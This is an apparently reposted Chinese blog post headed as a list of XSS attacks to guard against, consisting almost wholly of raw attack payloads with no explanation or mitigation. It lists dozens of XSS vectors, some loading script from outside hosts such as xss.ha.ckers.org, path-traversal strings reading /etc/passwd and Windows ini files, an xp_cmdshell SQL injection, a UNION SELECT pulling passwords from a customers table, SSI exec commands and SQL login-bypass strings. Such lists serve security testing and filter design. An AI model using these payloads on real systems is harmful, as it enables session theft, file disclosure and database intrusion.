zoukankan
html css js c++ java
需要防范的XSS攻击
>
<
script
>
alert(document.cookie)
</
script
>
='>
<
script
>
alert(document.cookie)
</
script
>
<
script
>
alert(document.cookie)
</
script
>
<
script
>
alert(vulnerable)
</
script
>
%3Cscript%3Ealert('XSS')%3C/script%3E
<
script
>
alert('XSS')
</
script
>
<
img
src
="javascript:alert('XSS')"
>
%0a%0a
<
script
>
alert(\
"
Vulnerable\
"
)
</
script
>
.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
<
script
>
alert('Vulnerable');
</
script
>
<
script
>
alert('Vulnerable')
</
script
>
?sql_debug=1
a%5c.aspx
a.jsp/
<
script
>
alert('Vulnerable')
</
script
>
a/
a?
<
script
>
alert('Vulnerable')
</
script
>
">
<
script
>
alert('Vulnerable')
</
script
>
';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E
&SESSION_ID
={SESSION_ID}
&SESSION_ID
=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
..\..\..\..\..\..\..\..\windows\system.ini
\..\..\..\..\..\..\..\..\windows\system.ini
'';!--"
<
XSS
>
=&{()}
<
IMG
SRC
="javascript:alert('XSS');"
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
=JaVaScRiPt:alert('XSS')
>
<
IMG
SRC
=JaVaScRiPt:alert("XSS")
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
=javascript:alert('XSS')
>
<
IMG
SRC
="jav ascript:alert('XSS');"
>
<
IMG
SRC
="jav ascript:alert('XSS');"
>
<
IMG
SRC
="jav ascript:alert('XSS');"
>
"
<
IMG
SRC
=java\0script:alert(\"XSS\")
>
";' > out
<
IMG
SRC
=" javascript:alert('XSS');"
>
<
SCRIPT
>
a
=/
XSS
/
alert(a.source)
</
SCRIPT
>
<
BODY
BACKGROUND
="javascript:alert('XSS')"
>
<
BODY
ONLOAD
=alert('XSS')
>
<
IMG
DYNSRC
="javascript:alert('XSS')"
>
<
IMG
LOWSRC
="javascript:alert('XSS')"
>
<
BGSOUND
SRC
="javascript:alert('XSS');"
>
<
br
size
="&{alert('XSS')}"
>
<
LAYER
SRC
="http://xss.ha.ckers.org/a.js"
></
layer
>
<
LINK
REL
="stylesheet"
HREF
="javascript:alert('XSS');"
>
<
IMG
SRC
='vbscript:msgbox("XSS")'
>
<
IMG
SRC
="mocha:[code]"
>
<
IMG
SRC
="livescript:[code]"
>
<
META
HTTP-EQUIV
="refresh"
CONTENT
="0;url=javascript:alert('XSS');"
>
<
IFRAME
SRC
=javascript:alert('XSS')
></
IFRAME
>
<
FRAMESET
><
FRAME
SRC
=javascript:alert('XSS')
></
FRAME
></
FRAMESET
>
<
TABLE
BACKGROUND
="javascript:alert('XSS')"
>
<
DIV
STYLE
="background-image: url(javascript:alert('XSS'))"
>
<
DIV
STYLE
="behaviour: url('http://www.how-to-hack.org/exploit.html');"
>
<
DIV
STYLE
=" expression(alert('XSS'));"
>
<
STYLE
>
@im\port'\ja\vasc\ript:alert("XSS")';
</
STYLE
>
<
IMG
STYLE
='xss:expre\ssion(alert("XSS"))'
>
<
STYLE
TYPE
="text/javascript"
>
alert('XSS');
</
STYLE
>
<
STYLE
TYPE
="text/css"
>
.XSS
{
}
{
background-image
:
url("javascript:alert('XSS')")
;
}
</
STYLE
><
A
CLASS
=XSS
></
A
>
<
STYLE
type
="text/css"
>
BODY
{
}
{
background
:
url("javascript:alert('XSS')")
}
</
STYLE
>
<
BASE
HREF
="javascript:alert('XSS');//"
>
getURL("javascript:alert('XSS')")
a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
<
XML
SRC
="javascript:alert('XSS');"
>
">
<
BODY
ONLOAD
="a();"
><
SCRIPT
>
function
a()
{alert('XSS');}
</
SCRIPT
><
"
<SCRIPT
SRC
=""
></
SCRIPT
>
<
IMG
SRC
="javascript:alert('XSS')"
<!--#exec cmd
="/bin/echo '<SCRIPT SRC'"
--
>
<!--
#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"
-->
<
IMG
SRC
="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"
>
<
SCRIPT
a
=">"
SRC
="http://xss.ha.ckers.org/a.js"
></
SCRIPT
>
<
SCRIPT
=">"
SRC
="http://xss.ha.ckers.org/a.js"
></
SCRIPT
>
<
SCRIPT
a
=">"
'' SRC
="http://xss.ha.ckers.org/a.js"
></
SCRIPT
>
<
SCRIPT
"a
='
>
'
"
SRC=
"
http:
//
xss.ha.ckers.org/a.js"></SCRIPT>
<
SCRIPT
>
document.write(
"
<SCRI
"
);
</
SCRIPT
>
PT SRC="http://xss.ha.ckers.org/a.js">
</
SCRIPT
>
<
A
HREF
=http://www.gohttp://www.google.com/ogle.com
/>
link
</
A
>
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
QQ:273352165 evlon#126.com 转载请注明出处。
查看全文
相关阅读:
Chrome浏览器另存为时浏览器假死问题
excel的新增日期快捷键Ctrl+;失效解决办法
制作Visual Studio 2019 (VS 2019) 离线安装包
Sysinternals Suite 工具包使用指南
如何关闭Acrobat Reader DC自动更新
MySql like模糊查询使用详解
注册表删除我的电脑WPS云盘图标
解除Word文档的限制编辑!
IIS Ftp端口设置
[UnityShader基础]12.坐标空间
原文地址:https://www.cnblogs.com/evlon/p/849543.html
最新文章
ndoe 连接mysql报错
mac mysql 重启失败
js篇- js return true, return false, return 区别
8月份打卡
7月份打卡--
2019-6月份打卡
npm 或者 yarn 安装 chromedriver时失败
原生js 实现jquery addClass,removeClass
webpack 打包总结
ORACLE 重复数据修改其中一条
热门文章
常见等待事件
ORACLE TRUNCATE执行过慢
判断ORACLE是否存在数字
Linux 删除前三天的文件
ORACLE关于日志文件基本操作
Oracle UNDOTBS表空间的查看与扩容
-bash: fork: Cannot allocate memory 问题的处理
Unsupported major.minor version 52.0解决办法r.minor version 52.0解决办法
如何处理Oracle中TEMP表空间满的问题?
Discuz!X3.4全新安装详细图文教程(含目录权限设置)
Copyright © 2011-2022 走看看